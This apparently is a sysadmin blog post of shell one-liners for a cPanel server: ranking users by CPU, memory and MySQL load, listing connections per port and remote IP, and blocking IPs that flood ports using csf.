OUT=$(/usr/local/cpanel/bin/dcpumonview | grep -v Top  | sed -e 's#<[^>]*># #g' | while read i ; do NF=`echo $i | awk {'print NF'}` ; if [[ "$NF" == "5" ]] ; then USER=`echo $i | awk {'print $1'}`; OWNER=`grep -e "^OWNER=" /var/cpanel/users/$USER | cut -d= -f2` ; echo "$OWNER $i"; fi ; done) ; (echo "USER CPU" ; echo "$OUT" | sort -nrk4 | awk '{printf "%s %s%\n",$2,$4}' | head -5) | column -t ;echo;(echo -e "USER MEMORY" ; echo "$OUT" | sort -nrk5 | awk '{printf "%s %s%\n",$2,$5}' | head -5) | column -t ;echo;(echo -e "USER MYSQL" ; echo "$OUT" | sort -nrk6 |
awk '{printf "%s %s%\n",$2,$6}' | head -5) | column -t ;

~~~~~~~~~~~

Finging connections to server 

netstat -pltuna | awk '$6=="LISTEN"{sub(/^.*:+/,"",$4);sub(/^[[:digit:]]+\//,"",$7);idx=sprintf("%s:%05d",$1,$4);ary[idx]=$7;} $6~"^(ESTABLISHED|SYN_RECV|FIN_WAIT2|UNKNOWN)$"{sub(/^.*:(:ffff:)?/,"",$4);sub(/:[[:digit:]]+$/,"",$5);sub(/^::ffff:/,"",$5);idx=sprintf("%s:%05d@%s",$1,$4,$5);cons[idx]++;}END{LIMITS["def"]=30;LIMITS[21]=8;LIMITS[25]=5;LIMITS[26]=5;LIMITS[465]=5;LIMITS[587]=5;CL_NML="\033[0m";CL_WTE="\033[1;37m";CL_GRN="\033[0;32m";CL_YLW="\033[1;36m";CL_RED="\033[1;5;31;22;47m";n=asorti(ary,src);for(i=1;i<=n;i++){split(src[i],meh,/:/);sub(/^0*/,"",meh[2]);print CL_WTE ary[src[i]] CL_NML " " CL_GRN "(" meh[1] ":" meh[2] ")" CL_NML ":";delete nastyhack;for (q in cons){split(q,splt,/@/);if(match(splt[1],src[i])){fmtstr=sprintf("%010d %s",cons[q],splt[2]);nastyhack[fmtstr]=fmtstr;}}r=asort(nastyhack);zerocount=match(nastyhack[r],/[^0]/);for (m=1;m<=r;m++){nastyhack[m]=substr(nastyhack[m],zerocount);split(nastyhack[m],brg,/ /);printf CL_YLW brg[1] CL_NML " ";port=meh[2];if(!(port in LIMITS)) port="def";if (brg[1]>LIMITS[port]) printf CL_RED;print brg[2] CL_NML;}}}'



Blocking Ips DDOS

  ~~~~~~~~~~~~

grep "Port Flood" /var/log/messages | grep "Jul 17" | awk '{ print $12 }' | cut -d = -f2 | sort | uniq -c | sort -n > /root/testflood

    cat /root/testflood

    while read line; do number=$(echo $line | awk {'print $1'}); ip=$(echo $line | awk {'print $2'}); if [ $number -gt 500 ]; then csf -d $ip "Wp attack"; fi; done < /root/testflood

~~~~~~~~~~~~


at No comments:
Labels: ,
Subscribe to: Posts (Atom)